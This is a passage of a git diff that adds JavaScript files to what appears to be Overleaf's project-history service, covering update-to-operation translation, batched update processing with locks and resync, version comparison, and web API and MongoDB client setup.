isDeleteCommentUpdate(update) { + return 'deleteComment' in update +} + +/** + * @param {Update} update + * @returns {update is SetFileMetadataOperation} + */ +export function isSetFileMetadataOperation(update) { + return 'metadata' in update +} + +export function _convertPathname(pathname) { + // Strip leading / + pathname = pathname.replace(/^\//, '') + // Replace \\ with _. Backslashes are no longer allowed + // in projects in web, but we have some which have gone through + // into history before this restriction was added. This makes + // them valid for the history store. + // See https://github.com/overleaf/write_latex/issues/4471 + pathname = pathname.replace(/\\/g, '_') + // workaround for filenames containing asterisks, this will + // fail if a corresponding replacement file already exists but it + // would fail anyway without this attempt to fix the pathname. + // See https://github.com/overleaf/internal/issues/900 + pathname = pathname.replace(/\*/g, '__ASTERISK__') + // workaround for filenames beginning with spaces + // See https://github.com/overleaf/internal/issues/1404 + // note: we have already stripped any leading slash above + pathname = pathname.replace(/^ /, '__SPACE__') // handle top-level + pathname = pathname.replace(/\/ /g, '/__SPACE__') // handle folders + return pathname +} + +class OperationsBuilder { + /** + * @param {number} docLength + * @param {string} pathname + */ + constructor(docLength, pathname) { + /** + * List of operations being built + */ + this.operations = [] + + /** + * Currently built text operation + * + * @type {RawScanOp[]} + */ + this.textOperation = [] + + /** + * Cursor inside the current text operation + */ + this.cursor = 0 + + this.docLength = docLength + this.pathname = pathname + } + + /** + * @param {Op} op + * @param {TextUpdate} update + * @returns {void} + */ + addOp(op, update) { + // We sometimes receive operations that operate at positions outside the + // docLength. Document updater coerces the position to the end of the + // document. We do the same here. + const pos = Math.min(op.hpos ?? op.p, this.docLength) + + if (isComment(op)) { + // Commit the current text operation + this.commitTextOperation() + + // Add a comment operation + const commentLength = op.hlen ?? op.c.length + const commentOp = { + pathname: this.pathname, + commentId: op.t, + ranges: commentLength > 0 ? [{ pos, length: commentLength }] : [], + } + if ('resolved' in op) { + commentOp.resolved = op.resolved + } + this.operations.push(commentOp) + return + } + + if (!isInsert(op) && !isDelete(op) && !isRetain(op)) { + throw new Errors.UnexpectedOpTypeError('unexpected op type', { op }) + } + + if (pos < this.cursor) { + this.commitTextOperation() + // At this point, this.cursor === 0 and we can continue + } + + if (pos > this.cursor) { + this.retain(pos - this.cursor) + } + + if (isInsert(op)) { + if (op.trackedDeleteRejection) { + this.retain(op.i.length, { + tracking: { type: 'none' }, + }) + } else { + const opts = {} + if (update.meta.tc != null) { + opts.tracking = { + type: 'insert', + userId: update.meta.user_id, + ts: new Date(update.meta.ts).toISOString(), + } + } + if (op.commentIds != null) { + opts.commentIds = op.commentIds + } + this.insert(op.i, opts) + } + } + + if (isRetain(op)) { + if (op.tracking) { + this.retain(op.r.length, { tracking: op.tracking }) + } else { + this.retain(op.r.length) + } + } + + if (isDelete(op)) { + const changes = op.trackedChanges ?? [] + + // Tracked changes should already be ordered by offset, but let's make + // sure they are. + changes.sort((a, b) => { + const posOrder = a.offset - b.offset + if (posOrder !== 0) { + return posOrder + } else if (a.type === 'insert' && b.type === 'delete') { + return 1 + } else if (a.type === 'delete' && b.type === 'insert') { + return -1 + } else { + return 0 + } + }) + + let offset = 0 + for (const change of changes) { + if (change.offset > offset) { + // Handle the portion before the tracked change + if (update.meta.tc != null) { + // This is a tracked delete + this.retain(change.offset - offset, { + tracking: { + type: 'delete', + userId: update.meta.user_id, + ts: new Date(update.meta.ts).toISOString(), + }, + }) + } else { + // This is a regular delete + this.delete(change.offset - offset) + } + offset = change.offset + } + + // Now, handle the portion inside the tracked change + if (change.type === 'delete') { + // Tracked deletes are skipped over when deleting + this.retain(change.length) + } else if (change.type === 'insert') { + // Deletes inside tracked inserts are always regular deletes + this.delete(change.length) + offset += change.length + } + } + if (offset < op.d.length) { + // Handle the portion after the last tracked change + if (update.meta.tc != null) { + // This is a tracked delete + this.retain(op.d.length - offset, { + tracking: { + type: 'delete', + userId: update.meta.user_id, + ts: new Date(update.meta.ts).toISOString(), + }, + }) + } else { + // This is a regular delete + this.delete(op.d.length - offset) + } + } + } + } + + /** + * @param {number} length + * @param {object} opts + * @param {TrackingDirective} [opts.tracking] + */ + retain(length, opts = {}) { + if (opts.tracking) { + this.textOperation.push({ r: length, ...opts }) + } else { + this.textOperation.push(length) + } + this.cursor += length + } + + /** + * @param {string} str + * @param {object} opts + * @param {TrackingProps} [opts.tracking] + * @param {string[]} [opts.commentIds] + */ + insert(str, opts = {}) { + if (opts.tracking || opts.commentIds) { + this.textOperation.push({ i: str, ...opts }) + } else { + this.textOperation.push(str) + } + this.cursor += str.length + this.docLength += str.length + } + + /** + * @param {number} length + * @param {object} opts + */ + delete(length, opts = {}) { + this.textOperation.push(-length) + this.docLength -= length + } + + /** + * Finalize the current text operation and push it to the queue + * + * @param {object} [opts] + * @param {string} [opts.contentHash] + */ + commitTextOperation(opts = {}) { + if (this.textOperation.length > 0 && this.cursor < this.docLength) { + this.retain(this.docLength - this.cursor) + } + if (this.textOperation.length > 0) { + const operation = { + pathname: this.pathname, + textOperation: this.textOperation, + } + if (opts.contentHash != null) { + operation.contentHash = opts.contentHash + } + this.operations.push(operation) + this.textOperation = [] + } + this.cursor = 0 + } + + finish() { + this.commitTextOperation() + return this.operations + } +} diff --git a/services/project-history/app/js/UpdatesProcessor.js b/services/project-history/app/js/UpdatesProcessor.js new file mode 100644 index 0000000..b52fac7 --- /dev/null +++ b/services/project-history/app/js/UpdatesProcessor.js @@ -0,0 +1,800 @@ +import { promisify } from 'node:util' +import logger from '@overleaf/logger' +import async from 'async' +import metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import OError from '@overleaf/o-error' +import * as HistoryStoreManager from './HistoryStoreManager.js' +import * as UpdateTranslator from './UpdateTranslator.js' +import * as BlobManager from './BlobManager.js' +import * as RedisManager from './RedisManager.js' +import * as ErrorRecorder from './ErrorRecorder.js' +import * as LockManager from './LockManager.js' +import * as UpdateCompressor from './UpdateCompressor.js' +import * as WebApiManager from './WebApiManager.js' +import * as SyncManager from './SyncManager.js' +import * as Versions from './Versions.js' +import * as Errors from './Errors.js' +import * as Metrics from './Metrics.js' +import * as RetryManager from './RetryManager.js' +import { Profiler } from './Profiler.js' + +const keys = Settings.redis.lock.key_schema + +export const REDIS_READ_BATCH_SIZE = 500 + +/** + * Container for functions that need to be mocked in tests + * + * TODO: Rewrite tests in terms of exported functions only + */ +export const _mocks = {} + +export function getRawUpdates(projectId, batchSize, callback) { + RedisManager.getRawUpdatesBatch(projectId, batchSize, (error, batch) => { + if (error != null) { + return callback(OError.tag(error)) + } + + let updates + try { + updates = RedisManager.parseDocUpdates(batch.rawUpdates) + } catch (error) { + return callback(OError.tag(error)) + } + + _getHistoryId(projectId, updates, (error, historyId) => { + if (error != null) { + return callback(OError.tag(error)) + } + HistoryStoreManager.getMostRecentChunk( + projectId, + historyId, + (error, chunk) => { + if (error != null) { + return callback(OError.tag(error)) + } + callback(null, { project_id: projectId, chunk, updates }) + } + ) + }) + }) +} + +// Trigger resync and start processing under lock to avoid other operations to +// flush the resync updates. +export function startResyncAndProcessUpdatesUnderLock( + projectId, + opts, + callback +) { + const startTimeMs = Date.now() + LockManager.runWithLock( + keys.projectHistoryLock({ project_id: projectId }), + (extendLock, releaseLock) => { + SyncManager.startResyncWithoutLock(projectId, opts, err => { + if (err) return callback(OError.tag(err)) + extendLock(err => { + if (err) return callback(OError.tag(err)) + _countAndProcessUpdates( + projectId, + extendLock, + REDIS_READ_BATCH_SIZE, + releaseLock + ) + }) + }) + }, + (flushError, queueSize) => { + if (flushError) { + OError.tag(flushError) + ErrorRecorder.record(projectId, queueSize, flushError, recordError => { + if (recordError) { + logger.error( + { err: recordError, projectId }, + 'failed to record error' + ) + } + callback(flushError) + }) + } else { + ErrorRecorder.clearError(projectId, clearError => { + if (clearError) { + logger.error( + { err: clearError, projectId }, + 'failed to clear error' + ) + } + callback() + }) + } + if (queueSize > 0) { + const duration = (Date.now() - startTimeMs) / 1000 + Metrics.historyFlushDurationSeconds.observe(duration) + Metrics.historyFlushQueueSize.observe(queueSize) + } + // clear the timestamp in the background if the queue is now empty + RedisManager.clearDanglingFirstOpTimestamp(projectId, () => {}) + } + ) +} + +// Process all updates for a project, only check project-level information once +export function processUpdatesForProject(projectId, callback) { + const startTimeMs = Date.now() + LockManager.runWithLock( + keys.projectHistoryLock({ project_id: projectId }), + (extendLock, releaseLock) => { + _countAndProcessUpdates( + projectId, + extendLock, + REDIS_READ_BATCH_SIZE, + releaseLock + ) + }, + (flushError, queueSize) => { + if (flushError) { + OError.tag(flushError) + ErrorRecorder.record( + projectId, + queueSize, + flushError, + (recordError, failure) => { + if (recordError) { + logger.error( + { err: recordError, projectId }, + 'failed to record error' + ) + callback(recordError) + } else if ( + RetryManager.isFirstFailure(failure) && + RetryManager.isHardFailure(failure) + ) { + // This is the first failed flush since the last successful flush. + // Immediately attempt a resync. + logger.warn({ projectId }, 'Flush failed, attempting resync') + resyncProject(projectId, callback) + } else { + callback(flushError) + } + } + ) + } else { + ErrorRecorder.clearError(projectId, clearError => { + if (clearError) { + logger.error( + { err: clearError, projectId }, + 'failed to clear error' + ) + } + callback() + }) + } + if (queueSize > 0) { + const duration = (Date.now() - startTimeMs) / 1000 + Metrics.historyFlushDurationSeconds.observe(duration) + Metrics.historyFlushQueueSize.observe(queueSize) + } + // clear the timestamp in the background if the queue is now empty + RedisManager.clearDanglingFirstOpTimestamp(projectId, () => {}) + } + ) +} + +export function resyncProject(projectId, callback) { + SyncManager.startHardResync(projectId, {}, error => { + if (error != null) { + return callback(OError.tag(error)) + } + // Flush the sync operations; this will not loop indefinitely + // because any failure won't be the first failure anymore. + LockManager.runWithLock( + keys.projectHistoryLock({ project_id: projectId }), + (extendLock, releaseLock) => { + _countAndProcessUpdates( + projectId, + extendLock, + REDIS_READ_BATCH_SIZE, + releaseLock + ) + }, + (flushError, queueSize) => { + if (flushError) { + ErrorRecorder.record( + projectId, + queueSize, + flushError, + (recordError, failure) => { + if (recordError) { + logger.error( + { err: recordError, projectId }, + 'failed to record error' + ) + callback(OError.tag(recordError)) + } else { + callback(OError.tag(flushError)) + } + } + ) + } else { + ErrorRecorder.clearError(projectId, clearError => { + if (clearError) { + logger.error( + { err: clearError, projectId }, + 'failed to clear error' + ) + } + callback() + }) + } + } + ) + }) +} + +export function processUpdatesForProjectUsingBisect( + projectId, + amountToProcess, + callback +) { + LockManager.runWithLock( + keys.projectHistoryLock({ project_id: projectId }), + (extendLock, releaseLock) => { + _countAndProcessUpdates( + projectId, + extendLock, + amountToProcess, + releaseLock + ) + }, + (flushError, queueSize) => { + if (amountToProcess === 0 || queueSize === 0) { + // no further processing possible + if (flushError != null) { + ErrorRecorder.record( + projectId, + queueSize, + OError.tag(flushError), + recordError => { + if (recordError) { + logger.error( + { err: recordError, projectId }, + 'failed to record error' + ) + } + callback(flushError) + } + ) + } else { + callback() + } + } else { + if (flushError != null) { + // decrease the batch size when we hit an error + processUpdatesForProjectUsingBisect( + projectId, + Math.floor(amountToProcess / 2), + callback + ) + } else { + // otherwise continue processing with the same batch size + processUpdatesForProjectUsingBisect( + projectId, + amountToProcess, + callback + ) + } + } + } + ) +} + +export function processSingleUpdateForProject(projectId, callback) { + LockManager.runWithLock( + keys.projectHistoryLock({ project_id: projectId }), + ( + extendLock, + releaseLock // set the batch size to 1 for single-stepping + ) => { + _countAndProcessUpdates(projectId, extendLock, 1, releaseLock) + }, + (flushError, queueSize) => { + // no need to clear the flush marker when single stepping + // it will be cleared up on the next background flush if + // the queue is empty + if (flushError) { + ErrorRecorder.record(projectId, queueSize, flushError, recordError => { + if (recordError) { + logger.error( + { err: recordError, projectId }, + 'failed to record error' + ) + } + callback(flushError) + }) + } else { + ErrorRecorder.clearError(projectId, clearError => { + if (clearError) { + logger.error( + { err: clearError, projectId }, + 'failed to clear error' + ) + } + callback() + }) + } + } + ) +} + +_mocks._countAndProcessUpdates = ( + projectId, + extendLock, + batchSize, + callback +) => { + RedisManager.countUnprocessedUpdates(projectId, (error, queueSize) => { + if (error != null) { + return callback(OError.tag(error)) + } + if (queueSize > 0) { + logger.debug({ projectId, queueSize }, 'processing uncompressed updates') + RedisManager.getUpdatesInBatches( + projectId, + batchSize, + (updates, cb) => { + _processUpdatesBatch(projectId, updates, extendLock, cb) + }, + error => { + // Unconventional callback signature. The caller needs the queue size + // even when an error is thrown in order to record the queue size in + // the projectHistoryFailures collection. We'll have to find another + // way to achieve this when we promisify. + callback(error, queueSize) + } + ) + } else { + logger.debug({ projectId }, 'no updates to process') + callback(null, queueSize) + } + }) +} + +function _countAndProcessUpdates(...args) { + _mocks._countAndProcessUpdates(...args) +} + +function _processUpdatesBatch(projectId, updates, extendLock, callback) { + // If the project doesn't have a history then we can bail out here + _getHistoryId(projectId, updates, (error, historyId) => { + if (error != null) { + return callback(OError.tag(error)) + } + + if (historyId == null) { + logger.debug( + { projectId }, + 'discarding updates as project does not use history' + ) + return callback() + } + + _processUpdates(projectId, historyId, updates, extendLock, error => { + if (error != null) { + return callback(OError.tag(error)) + } + callback() + }) + }) +} + +export function _getHistoryId(projectId, updates, callback) { + let idFromUpdates = null + + // check that all updates have the same history id + for (const update of updates) { + if (update.projectHistoryId != null) { + if (idFromUpdates == null) { + idFromUpdates = update.projectHistoryId.toString() + } else if (idFromUpdates !== update.projectHistoryId.toString()) { + metrics.inc('updates.batches.project-history-id.inconsistent-update') + return callback( + new OError('inconsistent project history id between updates', { + projectId, + idFromUpdates, + currentId: update.projectHistoryId, + }) + ) + } + } + } + + WebApiManager.getHistoryId(projectId, (error, idFromWeb) => { + if (error != null && idFromUpdates != null) { + // present only on updates + // 404s from web are an error + metrics.inc('updates.batches.project-history-id.from-updates') + return callback(null, idFromUpdates) + } else if (error != null) { + return callback(OError.tag(error)) + } + + if (idFromWeb == null && idFromUpdates == null) { + // present on neither web nor updates + callback(null, null) + } else if (idFromWeb != null && idFromUpdates == null) { + // present only on web + metrics.inc('updates.batches.project-history-id.from-web') + callback(null, idFromWeb) + } else if (idFromWeb == null && idFromUpdates != null) { + // present only on updates + metrics.inc('updates.batches.project-history-id.from-updates') + callback(null, idFromUpdates) + } else if (idFromWeb.toString() !== idFromUpdates.toString()) { + // inconsistent between web and updates + metrics.inc('updates.batches.project-history-id.inconsistent-with-web') + logger.warn( + { + projectId, + idFromWeb, + idFromUpdates, + updates, + }, + 'inconsistent project history id between updates and web' + ) + callback( + new OError('inconsistent project history id between updates and web') + ) + } else { + // the same on web and updates + metrics.inc('updates.batches.project-history-id.from-updates') + callback(null, idFromWeb) + } + }) +} + +function _handleOpsOutOfOrderError(projectId, projectHistoryId, err, ...rest) { + const adjustedLength = Math.max(rest.length, 1) + const results = rest.slice(0, adjustedLength - 1) + const callback = rest[adjustedLength - 1] + ErrorRecorder.getFailureRecord(projectId, (error, failureRecord) => { + if (error != null) { + return callback(error) + } + // Bypass ops-out-of-order errors in the stored chunk when in forceDebug mode + if (failureRecord != null && failureRecord.forceDebug === true) { + logger.warn( + { err, projectId, projectHistoryId }, + 'ops out of order in chunk, forced continue' + ) + callback(null, ...results) // return results without error + } else { + callback(err, ...results) + } + }) +} + +function _getMostRecentVersionWithDebug(projectId, projectHistoryId, callback) { + HistoryStoreManager.getMostRecentVersion( + projectId, + projectHistoryId, + (err, ...results) => { + if (err instanceof Errors.OpsOutOfOrderError) { + _handleOpsOutOfOrderError( + projectId, + projectHistoryId, + err, + ...results, + callback + ) + } else { + callback(err, ...results) + } + } + ) +} + +export function _processUpdates( + projectId, + projectHistoryId, + updates, + extendLock, + callback +) { + const profile = new Profiler('_processUpdates', { + project_id: projectId, + projectHistoryId, + }) + // skip updates first if we're in a sync, we might not need to do anything else + SyncManager.skipUpdatesDuringSync( + projectId, + updates, + (error, filteredUpdates, newSyncState) => { + profile.log('skipUpdatesDuringSync') + if (error != null) { + return callback(error) + } + if (filteredUpdates.length === 0) { + // return early if there are no updates to apply + return SyncManager.setResyncState(projectId, newSyncState, callback) + } + // only make request to history service if we have actual updates to process + _getMostRecentVersionWithDebug( + projectId, + projectHistoryId, + ( + error, + baseVersion, + projectStructureAndDocVersions, + _lastChange, + mostRecentChunk + ) => { + if (projectStructureAndDocVersions == null) { + projectStructureAndDocVersions = { project: null, docs: {} } + } + profile.log('getMostRecentVersion') + if (error != null) { + return callback(error) + } + async.waterfall( + [ + cb => { + cb = profile.wrap('expandSyncUpdates', cb) + SyncManager.expandSyncUpdates( + projectId, + projectHistoryId, + mostRecentChunk, + filteredUpdates, + extendLock, + cb + ) + }, + (expandedUpdates, cb) => { + let unappliedUpdates + try { + unappliedUpdates = _skipAlreadyAppliedUpdates( + projectId, + expandedUpdates, + projectStructureAndDocVersions + ) + } catch (err) { + return cb(err) + } + profile.log('skipAlreadyAppliedUpdates') + const compressedUpdates = + UpdateCompressor.compressRawUpdates(unappliedUpdates) + const timeTaken = profile + .log('compressRawUpdates') + .getTimeDelta() + if (timeTaken >= 1000) { + logger.debug( + { projectId, updates: unappliedUpdates, timeTaken }, + 'slow compression of raw updates' + ) + } + cb = profile.wrap('createBlobs', cb) + BlobManager.createBlobsForUpdates( + projectId, + projectHistoryId, + compressedUpdates, + extendLock, + cb + ) + }, + (updatesWithBlobs, cb) => { + let changes + try { + changes = UpdateTranslator.convertToChanges( + projectId, + updatesWithBlobs + ).map(change => change.toRaw()) + } catch (err) { + return cb(err) + } finally { + profile.log('convertToChanges') + } + cb(null, changes) + }, + (changes, cb) => { + let change + const numChanges = changes.length + const byteLength = Buffer.byteLength( + JSON.stringify(changes), + 'utf8' + ) + let numOperations = 0 + for (change of changes) { + if (change.operations != null) { + numOperations += change.operations.length + } + } + + metrics.timing('history-store.request.changes', numChanges, 1) + metrics.timing('history-store.request.bytes', byteLength, 1) + metrics.timing( + 'history-store.request.operations', + numOperations, + 1 + ) + + // thresholds taken from write_latex/main/lib/history_exporter.rb + if (numChanges > 1000) { + metrics.inc('history-store.request.exceeds-threshold.changes') + } + if (byteLength > Math.pow(1024, 2)) { + metrics.inc('history-store.request.exceeds-threshold.bytes') + const changeLengths = changes.map(change => + Buffer.byteLength(JSON.stringify(change), 'utf8') + ) + logger.warn( + { projectId, byteLength, changeLengths }, + 'change size exceeds limit' + ) + } + + cb = profile.wrap('sendChanges', cb) + // this is usually the longest request, so extend the lock before starting it + extendLock(error => { + if (error != null) { + return cb(error) + } + if (changes.length === 0) { + return cb() + } // avoid unnecessary requests to history service + HistoryStoreManager.sendChanges( + projectId, + projectHistoryId, + changes, + baseVersion, + cb + ) + }) + }, + cb => { + cb = profile.wrap('setResyncState', cb) + SyncManager.setResyncState(projectId, newSyncState, cb) + }, + ], + error => { + profile.end() + callback(error) + } + ) + } + ) + } + ) +} + +_mocks._skipAlreadyAppliedUpdates = ( + projectId, + updates, + projectStructureAndDocVersions +) => { + function alreadySeenProjectVersion(previousProjectStructureVersion, update) { + return ( + UpdateTranslator.isProjectStructureUpdate(update) && + previousProjectStructureVersion != null && + update.version != null && + Versions.gte(previousProjectStructureVersion, update.version) + ) + } + + function alreadySeenDocVersion(previousDocVersions, update) { + if (UpdateTranslator.isTextUpdate(update) && update.v != null) { + const docId = update.doc + return ( + previousDocVersions[docId] != null && + previousDocVersions[docId].v != null && + Versions.gte(previousDocVersions[docId].v, update.v) + ) + } else { + return false + } + } + + // check that the incoming updates are in the correct order (we do not + // want to send out of order updates to the history service) + let incomingProjectStructureVersion = null + const incomingDocVersions = {} + for (const update of updates) { + if (alreadySeenProjectVersion(incomingProjectStructureVersion, update)) { + logger.warn( + { projectId, update, incomingProjectStructureVersion }, + 'incoming project structure updates are out of order' + ) + throw new Errors.OpsOutOfOrderError( + 'project structure version out of order on incoming updates' + ) + } else if (alreadySeenDocVersion(incomingDocVersions, update)) { + logger.warn( + { projectId, update, incomingDocVersions }, + 'incoming doc updates are out of order' + ) + throw new Errors.OpsOutOfOrderError( + 'doc version out of order on incoming updates' + ) + } + // update the current project structure and doc versions + if (UpdateTranslator.isProjectStructureUpdate(update)) { + incomingProjectStructureVersion = update.version + } else if (UpdateTranslator.isTextUpdate(update)) { + incomingDocVersions[update.doc] = { v: update.v } + } + } + + // discard updates already applied + const updatesToApply = [] + const previousProjectStructureVersion = projectStructureAndDocVersions.project + const previousDocVersions = projectStructureAndDocVersions.docs + if (projectStructureAndDocVersions != null) { + const updateProjectVersions = [] + for (const update of updates) { + if (update != null && update.version != null) { + updateProjectVersions.push(update.version) + } + } + logger.debug( + { projectId, projectStructureAndDocVersions, updateProjectVersions }, + 'comparing updates with existing project versions' + ) + } + for (const update of updates) { + if (alreadySeenProjectVersion(previousProjectStructureVersion, update)) { + metrics.inc('updates.discarded_project_structure_version') + logger.debug( + { projectId, update, previousProjectStructureVersion }, + 'discarding previously applied project structure update' + ) + continue + } + if (alreadySeenDocVersion(previousDocVersions, update)) { + metrics.inc('updates.discarded_doc_version') + logger.debug( + { projectId, update, previousDocVersions }, + 'discarding previously applied doc update' + ) + continue + } + // remove non-BMP characters from resync updates that have bypassed the normal docupdater flow + _sanitizeUpdate(update) + // if all checks above are ok then accept the update + updatesToApply.push(update) + } + + return updatesToApply +} + +export function _skipAlreadyAppliedUpdates(...args) { + return _mocks._skipAlreadyAppliedUpdates(...args) +} + +function _sanitizeUpdate(update) { + // adapted from docupdater's UpdateManager, we should clean these in docupdater + // too but we already have queues with this problem so we will handle it here + // too for robustness. + // Replace high and low surrogate characters with 'replacement character' (\uFFFD) + const removeBadChars = str => str.replace(/[\uD800-\uDFFF]/g, '\uFFFD') + // clean up any bad chars in resync diffs + if (update.op) { + for (const op of update.op) { + if (op.i != null) { + op.i = removeBadChars(op.i) + } + } + } + // clean up any bad chars in resync new docs + if (update.docLines != null) { + update.docLines = removeBadChars(update.docLines) + } + return update +} + +export const promises = { + /** @type {(projectId: string) => Promise<number>} */ + processUpdatesForProject: promisify(processUpdatesForProject), + /** @type {(projectId: string, opts: any) => Promise<number>} */ + startResyncAndProcessUpdatesUnderLock: promisify( + startResyncAndProcessUpdatesUnderLock + ), +} diff --git a/services/project-history/app/js/Utils.js b/services/project-history/app/js/Utils.js new file mode 100644 index 0000000..9158b28 --- /dev/null +++ b/services/project-history/app/js/Utils.js @@ -0,0 +1,37 @@ +// @ts-check + +/** + * @import { CommentOp, DeleteOp, InsertOp, Op, RetainOp } from './types' + */ + +/** + * @param {Op} op + * @returns {op is InsertOp} + */ +export function isInsert(op) { + return 'i' in op && op.i != null +} + +/** + * @param {Op} op + * @returns {op is RetainOp} + */ +export function isRetain(op) { + return 'r' in op && op.r != null +} + +/** + * @param {Op} op + * @returns {op is DeleteOp} + */ +export function isDelete(op) { + return 'd' in op && op.d != null +} + +/** + * @param {Op} op + * @returns {op is CommentOp} + */ +export function isComment(op) { + return 'c' in op && op.c != null && 't' in op && op.t != null +} diff --git a/services/project-history/app/js/Validation.js b/services/project-history/app/js/Validation.js new file mode 100644 index 0000000..846cc12 --- /dev/null +++ b/services/project-history/app/js/Validation.js @@ -0,0 +1,12 @@ +import { celebrate, errors } from 'celebrate' + +export { Joi } from 'celebrate' + +export const errorMiddleware = errors() + +/** + * Validation middleware + */ +export function validate(schema) { + return celebrate(schema, { allowUnknown: true }) +} diff --git a/services/project-history/app/js/Versions.js b/services/project-history/app/js/Versions.js new file mode 100644 index 0000000..0733b20 --- /dev/null +++ b/services/project-history/app/js/Versions.js @@ -0,0 +1,68 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +// Compare Versions like 1.2 < 4.1 + +const convertToArray = v => Array.from(v.split('.')).map(x => parseInt(x, 10)) + +const cmp = function (v1, v2) { + // allow comparison to work with integers + if (typeof v1 === 'number' && typeof v2 === 'number') { + if (v1 > v2) { + return +1 + } + if (v1 < v2) { + return -1 + } + // otherwise equal + return 0 + } + // comparison with strings + v1 = convertToArray(v1) + v2 = convertToArray(v2) + while (v1.length || v2.length) { + const [x, y] = Array.from([v1.shift(), v2.shift()]) + if (x > y) { + return +1 + } + if (x < y) { + return -1 + } + if (x != null && y == null) { + return +1 + } + if (x == null && y != null) { + return -1 + } + } + return 0 +} + +export function compare(v1, v2) { + return cmp(v1, v2) +} + +export function gt(v1, v2) { + return cmp(v1, v2) > 0 +} + +export function lt(v1, v2) { + return cmp(v1, v2) < 0 +} + +export function gte(v1, v2) { + return cmp(v1, v2) >= 0 +} + +export function lte(v1, v2) { + return cmp(v1, v2) <= 0 +} diff --git a/services/project-history/app/js/WebApiManager.js b/services/project-history/app/js/WebApiManager.js new file mode 100644 index 0000000..2697db2 --- /dev/null +++ b/services/project-history/app/js/WebApiManager.js @@ -0,0 +1,112 @@ +import { callbackify } from 'node:util' +import { setTimeout } from 'node:timers/promises' +import logger from '@overleaf/logger' +import Metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import { + fetchNothing, + fetchJson, + RequestFailedError, +} from '@overleaf/fetch-utils' +import * as Errors from './Errors.js' +import * as RedisManager from './RedisManager.js' + +let RETRY_TIMEOUT_MS = 5000 + +async function getHistoryId(projectId) { + Metrics.inc('history_id_cache_requests_total') + const cachedHistoryId = + await RedisManager.promises.getCachedHistoryId(projectId) + if (cachedHistoryId) { + Metrics.inc('history_id_cache_hits_total') + return cachedHistoryId + } else { + const project = await _getProjectDetails(projectId) + const historyId = + project.overleaf && + project.overleaf.history && + project.overleaf.history.id + if (historyId != null) { + await RedisManager.promises.setCachedHistoryId(projectId, historyId) + } + return historyId + } +} + +async function requestResync(projectId, opts = {}) { + try { + const body = {} + if (opts.historyRangesMigration) { + body.historyRangesMigration = opts.historyRangesMigration + } + if (opts.resyncProjectStructureOnly) { + body.resyncProjectStructureOnly = opts.resyncProjectStructureOnly + } + await fetchNothing( + `${Settings.apis.web.url}/project/${projectId}/history/resync`, + { + method: 'POST', + signal: AbortSignal.timeout(6 * 60000), + basicAuth: { + user: Settings.apis.web.user, + password: Settings.apis.web.pass, + }, + json: body, + } + ) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + throw new Errors.NotFoundError('got a 404 from web api').withCause(err) + } else { + throw err + } + } +} + +async function _getProjectDetails(projectId, callback) { + logger.debug({ projectId }, 'getting project details from web') + let attempts = 0 + while (true) { + attempts += 1 + try { + return await fetchJson( + `${Settings.apis.web.url}/project/${projectId}/details`, + { + signal: AbortSignal.timeout(16000), + basicAuth: { + user: Settings.apis.web.user, + password: Settings.apis.web.pass, + }, + } + ) + } catch (err) { + if (err instanceof RequestFailedError && err.response.status === 404) { + throw new Errors.NotFoundError('got a 404 from web api').withCause(err) + } else if (attempts < 2) { + // retry after 5 seconds + await setTimeout(RETRY_TIMEOUT_MS) + } else { + throw err + } + } + } +} + +/** + * Adjust the retry timeout in tests + */ +export async function setRetryTimeoutMs(timeoutMs) { + RETRY_TIMEOUT_MS = timeoutMs +} + +// EXPORTS + +const getHistoryIdCb = callbackify(getHistoryId) +const requestResyncCb = callbackify(requestResync) + +export { getHistoryIdCb as getHistoryId, requestResyncCb as requestResync } + +export const promises = { + getHistoryId, + requestResync, +} diff --git a/services/project-history/app/js/mongo-types.ts b/services/project-history/app/js/mongo-types.ts new file mode 100644 index 0000000..9894e65 --- /dev/null +++ b/services/project-history/app/js/mongo-types.ts @@ -0,0 +1,22 @@ +import { ObjectId } from 'mongodb-legacy' + +export type ProjectHistoryFailure = { + _id: ObjectId + project_id: string + attempts: number + resyncAttempts: number + resyncStartedAt: Date + requestCount?: number + history: (ErrorRecord | SyncStartRecord)[] +} & ErrorRecord + +type ErrorRecord = { + error: string + stack: string + queueSize: number + ts: Date +} + +type SyncStartRecord = { + resyncStartedAt: Date +} diff --git a/services/project-history/app/js/mongodb.js b/services/project-history/app/js/mongodb.js new file mode 100644 index 0000000..d639903 --- /dev/null +++ b/services/project-history/app/js/mongodb.js @@ -0,0 +1,27 @@ +import Metrics from '@overleaf/metrics' +import Settings from '@overleaf/settings' +import mongodb from 'mongodb-legacy' +const { MongoClient, ObjectId } = mongodb + +/** + * @import { ProjectHistoryFailure } from './mongo-types.ts' + */ + +export { ObjectId } + +export const mongoClient = new MongoClient( + Settings.mongo.url, + Settings.mongo.options +) +const mongoDb = mongoClient.db() + +Metrics.mongodb.monitor(mongoClient) + +export const db = { + deletedProjects: mongoDb.collection('deletedProjects'), + projects: mongoDb.collection('projects'), + /** @type {mongodb.Collection<ProjectHistoryFailure>} */ + projectHistoryFailures: mongoDb.collection('projectHistoryFailures'), + projectHistoryLabels: mongoDb.collection('projectHistoryLabels'), + projectHistorySyncState: mongoDb.collection('projectHistorySyncState'), +} diff --git a/services/project-history/app/js/server.js b/services/project-history/app/js/server.js new file mode 100644 index 0000000..4f13198 --- /dev/null +++ b/services/project-history/app/js/server.js @@ -0,0 +1,61 @@ +import Metrics from '@overleaf/metrics' +import logger from '@overleaf/logger' +import express from 'express' +import bodyParser from 'body-parser' +import * as Errors from './Errors.js' +import * as Router from './Router.js' +import * as Validation from './Validation.js' + +const HistoryLogger = logger.initialize('project-history').logger + +Metrics.event_loop.monitor(logger) +Metrics.memory.monitor(logger) +Metrics.leaked_sockets.monitor(logger) +Metrics.open_sockets.monitor() + +// log updates as truncated strings +function truncateFn(updates) { + return JSON.parse( + JSON.stringify(updates, function (key, value) { + let len + if (typeof value === 'string' && (len = value.length) > 80) { + return ( + value.substr(0, 32) + + `...(message of length ${len} truncated)...` + + value.substr(-32) + ) + } else { + return value + } + }) + ) +} + +HistoryLogger.addSerializers({ + rawUpdate: truncateFn, + rawUpdates: truncateFn, + newUpdates: truncateFn, + 